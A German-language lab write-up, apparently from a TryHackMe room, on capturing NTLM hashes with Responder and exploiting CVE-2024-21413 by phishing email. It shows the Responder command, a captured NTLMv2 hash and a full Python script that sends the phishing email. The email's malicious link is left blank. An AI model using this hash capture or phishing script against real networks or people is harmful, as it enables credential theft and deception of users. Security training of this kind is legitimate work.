
Das Projekt wurde erstellt, um die Verwendung verschiedener Tools zum Erfassen von NTLM-Hashes von Benutzern in einem Netzwerk und zur Durchführung von Phishing-Angriffen per E-Mail zu demonstrieren. Es zeigt, wie Netzwerk-Authentifizierungsschwachstellen und Phishing-Methoden ausgenutzt werden können, um Systeme zu kompromittieren.
Projektziel: Das Projekt wurde erstellt, um den Einsatz verschiedener Tools zum Erfassen von NTLM-Hashes von Benutzern in einem Netzwerk und zur Durchführung von Phishing-Angriffen per E-Mail zu demonstrieren. Es zeigt, wie Netzwerk-Authentifizierungsschwachstellen und Phishing-Methoden ausgenutzt werden können, um Systeme zu kompromittieren.
Prozessbeschreibung
Ich führte den folgenden Befehl aus, um Responder zu starten:
root@ip-10-10-192-145:~# sudo responder -I ens5
Ich konfigurierte Responder so, dass es auf dem Interface ens5 lauscht. Es begann sofort, Authentifizierungsanfragen abzufangen, sodass ich NTLM-Hashes von Benutzern im Netzwerk sehen konnte, wie z. B. THM-MONIKERLINK\tryhackme und WORKGROUP\Administrator. So sah die Ausgabe beim Erfassen der Hashes aus:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
Diese Hashes können dann für Angriffe wie Brute-Force oder Hash-Angriffe verwendet werden.
Der Phishing-Link in der E-Mail sah so aus:
Hier ist das vollständige Python-Skript, das zum Senden der Phishing-E-Mail verwendet wurde:import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
Dieses Skript sendet eine E-Mail mit einem bösartigen Link, der möglicherweise die Schwachstelle CVE-2024-21413 ausnutzt.
Ergebnisse Als Ergebnis konnte ich zwei wesentliche Aspekte demonstrieren:
Dieses Projekt zeigte, wie Netzwerkschwachstellen und Phishing-Angriffe ausgenutzt werden können, um Zugriff auf Systeme zu erhalten. Es unterstrich auch die Bedeutung der Verteidigung gegen solche Angriffe durch starke Authentifizierungsmethoden und Filterung des E-Mail-Verkehrs.